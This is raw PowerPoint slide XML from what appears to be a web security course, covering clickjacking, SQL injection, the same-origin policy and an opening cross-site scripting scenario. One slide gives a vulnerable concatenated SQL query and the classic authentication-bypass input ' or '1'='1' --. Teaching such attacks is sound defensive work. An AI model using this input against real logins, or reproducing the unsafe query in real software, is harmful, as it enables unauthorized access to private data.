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43326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CLICKJACKING (AKA UI REDRESSING)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4220987" cy="3733800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tricks the user into clicking a pre-determined link in a rendered HTML page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use HTML frames and layers to confuse the user.  Did you just hit the piñata… or your best friend’s face???</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hides malicious content behind legitimate content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Facebook like button </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Re-tweet button</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not just for clicks anymore!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can also be used for text input (i.e. passwords, personal information)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="File:Piñ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76350"/>
            <a:ext cx="4038600" cy="268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971711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CLICKJACKING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Adobe Flash settings example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Clickjacking flaw can be leveraged to trick users into allowing access to their webca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52550"/>
            <a:ext cx="526231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ickJacking-Example-hacki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6200" y="1733549"/>
            <a:ext cx="5034396" cy="29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356235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Cursor spoofing attack to steal webcam access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="595271224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3687587" cy="3733800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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Hint 1: Most sites are DB-driven</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hint 2: Most sites accept user data submissions via GET/POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hint 3: Most sites manage authentication/authorization via DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hint 4: Most web developers are not security experts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Circumvent authentication/authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reveal private data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267200" y="1104900"/>
            <a:ext cx="4419600" cy="3524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400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Web Application Authorization Code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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statement = "SELECT * FROM users WHERE name ='" + userName + "';“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="14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kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Web POST or GET request sets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" kern="0" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> parameter to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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' or '1'='1' -- ‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="14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kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SQL Gets executed as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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SELECT * FROM users WHERE name = '' OR '1'='1';</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" kern="0" dirty="0">
              <a:latin typeface="+mn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kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Why is this bad and how can it be prevented?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3207998158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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bis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8030987" cy="3733800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are many flavors of SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Error driven SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Numeric or string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL statement injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UDF (User Defined Function) injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Timer based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Condition based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Not limited to DATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Un</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>fortunately not limited to DATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most SQL server offer mechanisms for bulk import/export from files AKA file system access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many provide mechanisms to  query remote databases AKA exfiltration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some SQL server even provide the ability to execute shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  AKA execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2021384182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Origin Policy ATTACKS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3458987" cy="3733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happens when you remove the dividers?  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser must keep non-related resources isolated, but…….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser must also allow for the modern web, where resources/APIs are commonly shared</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Are these two directives compatible?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Saturday, February 23, 2019</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15362" name="Picture 2" descr="http://www.exoticfishforum.com/attachments/betta-condo-jpg.4874/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39545"/>
            <a:ext cx="4618220" cy="346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645296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ORIGIN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>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Core security feature in all browsers, although not standardized.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“Resource from an origin may only access the same origin”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What is an origin?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Keyed by scheme, host, and port of a URL.  A ‘site identifier’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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://foo.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is a different origin than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://foo.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	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  <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://bar.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is the same origin as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://bar.com/pages/page1.html</a:t>
            </a:r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</a:rPr>
              <a:t>What does it control?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DOM Access between scripts running in the browser.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XMLHttpRequest (XHR) requests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Cookie access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Plugin access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Rules are meant to be broken (otherwise the Internet is very boring)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Image, Linking, Forms, Script sourcing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CORS (Cross Origin Resource Sharing)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Saturday, February 23,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39669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ORIGIN POLICY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SOP In Action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User downloads page with included script from origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://foo.com</a:t>
            </a:r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</a:rPr>
              <a:t>Script executes, and makes requests to origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://bar.com</a:t>
            </a:r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</a:rPr>
              <a:t>SOP Stops this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Why is this important?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How can we safely get around this?    CORS (Cross Origin Resource Sharing)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Saturday, February 23,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022159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 (XSS)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>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Goal: Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>client-side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> script into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>other user’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> browsers. (Bypassing SOP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Why?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Bypass SOP rules and allow for script execution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Once my script executes in another user’s browser, I can do many things.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How?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A form of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CODE INJECTION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Exploit a user’s trust in a site. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“I go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://catforums.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> every day, I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>know</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> it is safe!”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Malicious actor posts to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://catforums.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, and embeds script in the submission data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Submission data (i.e. comment posting) is accessed/displayed back to me, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>INCLUDING THE SCRIPT and/or MALICIOUS CONTENT.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200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Types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Persistent, more dangerous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Non-persistent, more common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Saturday, February 23,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04700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Non-Persistent XSS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400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bruce pays $15/month to a cat video site which displays cute cat videos in 1080p HD.   Visiting http://ubercatvids.com is his favorite thing to do after work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Karl notices that when you search on http://ubercatvids.com, the search string is displayed *as-is* back to the user.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  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://ubercatvids.com/search.cgi?searchword=fluffy&amp;lang=en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  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;html&gt;Your search for “fluffy” returned 15 hits!&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
